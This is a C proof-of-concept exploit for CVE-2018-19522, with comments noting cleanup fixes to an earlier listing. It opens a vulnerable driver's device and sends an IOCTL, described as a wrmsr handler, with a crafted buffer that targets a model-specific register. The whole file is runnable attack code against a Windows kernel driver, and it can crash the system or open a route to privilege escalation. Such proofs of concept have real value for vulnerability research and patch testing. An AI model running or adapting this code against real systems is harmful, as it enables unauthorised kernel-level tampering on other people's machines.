#include <windows.h>
#include <stdio.h>
#include <string.h>
typedef unsigned long long QWORD; // DWORD64-width alias; not referenced anywhere in this file
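/*
 * Proof-of-concept for CVE-2018-19522: opens the \\.\driveragent0 device
 * and issues IOCTL 0x800020F4 (labelled "wrmsr IOCTL" by the original
 * author) with a caller-controlled 0x20-byte input buffer. The two DWORDs
 * placed in that buffer and their offsets are taken verbatim from the
 * original; how the driver interprets them is not visible in this file
 * beyond the original "EDX (LOW)" / "ECX and RAX HIGH" comments, so treat
 * those labels as unverified.
 *
 * Corrected relative to the original listing:
 *   - the device handle and the allocation are released on every path
 *     (the original leaked both);
 *   - DeviceIoControl's BOOL result is checked (it was stored in an unused
 *     NTSTATUS and never examined, so a rejected IOCTL looked like success);
 *   - the input buffer is mapped PAGE_READWRITE rather than RWX, since it
 *     is only ever passed as IOCTL input and nothing executes from it;
 *   - the process exit status is 0/1 instead of ExitProcess(-1), which
 *     truncates a negative value into a UINT.
 *
 * argc/argv are unused.
 * Returns 0 when the IOCTL was issued and the driver reported success,
 * 1 on any failure.
 */
int main(int argc, char* argv[]) {
    (void)argc;
    (void)argv;

    int rc = 1;

    HANDLE hDriver = CreateFileW(L"\\\\.\\driveragent0", GENERIC_READ | GENERIC_WRITE, 0,
                                 NULL, OPEN_EXISTING, 0, NULL);
    if (hDriver == INVALID_HANDLE_VALUE) {
        printf("[!!!] Unable to find driver\n");
        return rc;
    }
    printf("[i] Found driver\n");

    /* The original placed the buffer at a fixed address; that is kept because
       the driver's handling of the buffer pointer is not visible here. Execute
       permission is dropped: the region is only read as IOCTL input. */
    BYTE *pInBuf = VirtualAlloc((LPVOID)0x41000000, 0x100, MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE);
    if (pInBuf == NULL) {
        printf("[!!!] Unable to allocate memory\n");
        goto out_close;
    }
    printf("[i] Allocated memory\n");
    memset(pInBuf, 0x00, 0x100);

    /* Values and offsets exactly as in the original PoC. The original author
       notes that only half of the value written to the MSR is controllable. */
    DWORD dwFirst = 0xFFFFFFFF;  /* "EDX (LOW)" per the original */
    DWORD dwSecond = 0xC0000083; /* "ECX and RAX HIGH" per the original */
    memcpy(pInBuf + 4, &dwFirst, sizeof dwFirst);
    memcpy(pInBuf + 8, &dwSecond, sizeof dwSecond);

    DWORD dwIoctl = 0x800020F4; /* "wrmsr IOCTL" per the original */
    printf("[i] Sending IOCTL 0x%lX\n", (unsigned long)dwIoctl);

    DWORD dwBytesOut = 0;
    /* DeviceIoControl returns BOOL, not NTSTATUS; on failure the reason is in GetLastError(). */
    if (!DeviceIoControl(hDriver, dwIoctl, pInBuf, 0x20, NULL, 0, &dwBytesOut, NULL)) {
        printf("[!!!] DeviceIoControl failed, error %lu\n", (unsigned long)GetLastError());
        goto out_free;
    }
    printf("[i] IOCTL completed, %lu bytes returned\n", (unsigned long)dwBytesOut);
    rc = 0;

out_free:
    VirtualFree(pInBuf, 0, MEM_RELEASE);
out_close:
    CloseHandle(hDriver);
    return rc;
}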